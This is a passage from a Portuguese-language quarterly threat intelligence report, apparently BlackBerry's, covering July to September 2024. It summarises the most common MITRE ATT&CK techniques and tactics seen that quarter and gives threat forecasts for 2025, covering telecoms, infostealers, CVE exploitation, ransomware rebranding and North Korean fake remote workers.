Criar ou modificar o processo do sistema
Serviço do Windows
Execução do AutoStart de inicialização ou de logon
Chaves de execução do registro/Pasta de inicialização
Descoberta de arquivos e diretórios
Descoberta remota do sistema
Interpretador de comandos e scripts
Impair Defesas

Técnicas de adversários proeminentes

Neste trimestre, o sequestro do fluxo de execução (T1574) surgiu como a técnica mais usada pelos adversários, e sua subtécnica, o carregamento lateral de DLL (T1574.002), ficou em segundo lugar. Esses métodos envolvem invasores que manipulam a forma como os sistemas operacionais executam programas, como o carregamento lateral de DLLs, geralmente para contornar os sistemas de segurança.

Além disso, é digno de nota o aumento da técnica Virtualization/Sandbox Evasion (T1497) entre as três primeiras. Isso sugere que o malware empregado pelos atacantes tinha um forte foco antidetecção, conforme indicado pelos binários estudados para chegar a essas conclusões.

Táticas detectadas

Nesse trimestre, as três principais táticas são Evasão de defesa, Escalonamento de privilégios e Persistência, conforme mostrado na Figura 20.

 

Figura 20: Táticas da MITRE ATT&CK, junho a setembro de 2024

Olhando para o futuro

Este relatório de 90 dias, que abrange de julho a setembro de 2024, foi elaborado para ajudá-lo a se manter informado e preparado para ameaças futuras. Grupos criminosos de alto nível, especialmente operadores de ransomware, estão explorando novas vulnerabilidades e encontrando valor em alvos grandes e pequenos. Conforme observado no relatório, os pesquisadores da BlackBerry observaram quase dois milhões de ataques interrompidos somente neste trimestre. Esse nível de atividade torna crucial manter-se atualizado com as últimas notícias sobre segurança para seu setor e região.

Veja o que esperar nos próximos meses:

Telecomunicações sob cerco

O setor de telecomunicações surgiu como um alvo principal em 2024, exemplificado pela violação da AT&T que comprometeu os registros de chamadas e textos em toda a sua rede. À medida que entramos em 2025, esperamos que os invasores visem cada vez mais a infraestrutura de telecomunicações em vez de dispositivos individuais, o que lhes permite interceptar comunicações em escala. O incidente do Salt Typhoon demonstrou como agentes sofisticados podem explorar vulnerabilidades em nível de rede para contornar as medidas de segurança tradicionais. Essa mudança de malware específico de dispositivo para ataques em nível de infraestrutura representa um desafio crítico, pois as organizações precisam repensar sua abordagem para proteger comunicações confidenciais em redes públicas de telecomunicações.

Infostealers e dados roubados em mercados negros

Ao longo de 2024, os infostealers foram uma característica predominante de nossos relatórios trimestrais de ameaças. Os notórios infostealers frequentemente ocupam posições de destaque em nossas listas de Principais Ameaças e apareceram inúmeras vezes em ataques em todo o mundo. De acordo com a Interpol, houve um aumento de 40% nas vendas na dark web de logs coletados de infostealers em 2023. Para 2025, espera-se que esse número aumente.

Patching e exploração

A exploração de vulnerabilidades não divulgadas ou recém-descobertas por agentes de ameaças, especialmente gangues de ransomware, não é um fenômeno novo. No entanto, o ritmo em que esses CVEs estão sendo explorados tem tornado cada vez mais desafiador para os profissionais de TI acompanharem o ritmo. Isso é particularmente verdadeiro em nosso mundo hiperconectado, com sua miríade de processos, aplicativos e serviços. Os criminosos cibernéticos estão cientes disso e buscam ativamente explorar quaisquer pontos fracos na infraestrutura de TI e na segurança de uma empresa para obter ganhos.

Durante esse período do relatório, mais de 50% de todos os novos CVEs tiveram pontuação acima de 7,0. Espera-se que a rápida exploração de CVEs e o armamento de provas de conceito (PoCs) continuem sendo desafios significativos para o setor no novo ano.

Mudança de marca e ressurgimento do ransomware

Nas últimas décadas, os profissionais de segurança cibernética e de aplicação da lei têm brincado de gato e rato com os desenvolvedores e afiliados de ransomware. No entanto, como mencionamos em nossa seção sobre o ransomware Lynx, a maioria dos grupos são amálgamas de outros, muitas vezes mudando a marca e usando outros códigos de ransomware ou comprando bases de códigos maliciosos de outros autores de malware. Essa tendência de mudança de marca, ressurgimento e reutilização de ransomware provavelmente continuará com a barreira de entrada no espaço do crime cibernético diminuindo constantemente.

Trabalhadores remotos norte-coreanos e identidades falsas

Espiões norte-coreanos teriam tentado se infiltrar em empresas de TI ocidentais fazendo-se passar por trabalhadores remotos. Esses criminosos cibernéticos criaram cuidadosamente identidades falsas, demonstraram as habilidades necessárias para passar em entrevistas e testes de emprego e mascararam suas localizações geográficas para evitar parecerem norte-coreanos. Em alguns casos, eles usaram a tecnologia deepfake. Uma vez contratados, eles tentavam exfiltrar dados internos e instalar utilitários de acesso remoto.

Prevemos que essa tendência de falsificação de identidades para se infiltrar em organizações continuará em 2025. É provável que a Coreia do Norte tenha implantado mais desses agentes secretos que ainda não foram descobertos e que eles provavelmente evoluirão suas táticas para evitar melhor a detecção.

Visite o blog da BlackBerry para ficar por dentro das ameaças e defesas de segurança cibernética em constante evolução.

Isenção de responsabilidade legal

As informações contidas no Relatório de Inteligência sobre Ameaças Globais do site BlackBerry destinam-se apenas a fins informativos. O site BlackBerry não garante nem se responsabiliza pela precisão, integridade e confiabilidade de quaisquer declarações ou pesquisas de terceiros aqui mencionadas. A análise expressa neste relatório reflete o entendimento atual das informações disponíveis por parte de nossos analistas de pesquisa e pode estar sujeita a alterações à medida que informações adicionais forem divulgadas. Os leitores são responsáveis por exercer sua própria diligência ao aplicar essas informações em suas vidas privadas e profissionais. O site BlackBerry não tolera qualquer uso malicioso ou indevido das informações apresentadas neste relatório.